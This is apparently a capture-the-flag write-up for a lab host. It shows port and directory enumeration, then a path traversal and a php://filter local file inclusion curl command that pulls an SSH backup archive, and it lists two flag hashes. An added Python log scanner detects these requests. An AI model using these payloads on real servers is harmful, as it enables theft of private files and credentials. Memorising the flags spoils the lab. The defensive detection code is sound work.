FLAG79

3ca569f9d5bc771b0457c4f4d42d29c4824e8d70

FLAG80

75a60cd346351234ecb8348d7c1da94dac75fc4c

Enumeration

rustscan -a 10.150.150.55
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
1055/tcp open  ansyslmd     syn-ack

nmap -sC -sV 10.150.150.55 -p 21,80,139,445,1055
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              13 Jun 12  2020 test
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.66.66.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
1055/tcp open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 46m25s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-27T09:30:03
|_  start_date: N/A

gobuster dir -u 10.150.150.55 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10918]
/index.php            (Status: 200) [Size: 1873]
/info.php             (Status: 200) [Size: 69973]
/server-status        (Status: 403) [Size: 278]

dirb http://10.150.150.55 /usr/share/wordlists/dirb/common.txt -X .php
---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/browser.php (CODE:500|SIZE:0)
+ http://10.150.150.55/index.php (CODE:200|SIZE:1873)
+ http://10.150.150.55/info.php (CODE:200|SIZE:70051)

Exploitation

Since /index.php is the only page that works, we can try something like http://10.150.150.55/index.php?path=/

Seems like we can find something interesting in http://10.150.150.55/index.php?path=/home/sally/backup

We can use a strategy learnt from HackTheBox Academy File Traversal:

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz

The command above fetches the file base64-encoded and decodes it on our local machine. We then extract the file:

tar -xvzf SSHArchiveBackup.tar.gz
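
Seen from the server side, both requests used above (the absolute path in ?path= and the php://filter wrapper in ?page=) stand out in the Apache access log. The following is an added example, not part of the original writeup, that flags them; the web root, the sample log lines and the function names are assumptions made for the illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WEB_ROOT = "/var/www/html"  # assumption: default Apache docroot on Ubuntu
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://", re.I)

# Constructed sample lines (Apache combined format), not captured from the lab host.
SAMPLE_LOG = """\
10.66.66.62 - - [27/Feb/2022:09:42:03 +0000] "GET /index.php?path=/home/sally/backup HTTP/1.1" 200 2101 "-" "curl/7.81.0"
10.66.66.62 - - [27/Feb/2022:09:43:37 +0000] "GET /trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz HTTP/1.1" 200 48211 "-" "curl/7.81.0"
10.66.66.62 - - [27/Feb/2022:09:45:12 +0000] "GET /index.php?path=/var/www/html/uploads HTTP/1.1" 200 1990 "-" "curl/7.81.0"
"""

def decode(value, rounds=3):
    """Percent-decode a bounded number of times so nested encoding cannot hide a path."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(value):
    """Return the reasons one parameter value looks like an arbitrary file read."""
    value, reasons = decode(value).strip(), []
    scheme = SCHEME_RE.match(value)
    if scheme and scheme.group(1).lower() not in ("http", "https"):
        reasons.append("stream-wrapper:" + scheme.group(1).lower())
        value = value.partition("resource=")[2] or value  # php://filter target
    if ".." in value.split("/"):
        reasons.append("dot-dot-segment")
    if value.startswith("/"):
        # Normalise first so /var/www/html/../x is judged by where it really points.
        if not (posixpath.normpath(value) + "/").startswith(WEB_ROOT + "/"):
            reasons.append("path-outside-webroot")
    return reasons

def scan(log_text):
    """Return (client, uri, status, reasons) for each suspicious request line."""
    hits = []
    for match in filter(None, map(REQUEST_RE.match, log_text.splitlines())):
        client, uri, status = match.groups()
        reasons = set()
        for _name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
            reasons.update(classify(value))
        if reasons:
            hits.append((client, uri, int(status), sorted(reasons)))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request is the signal worth alerting on, since it means the server returned content for a path outside the web root.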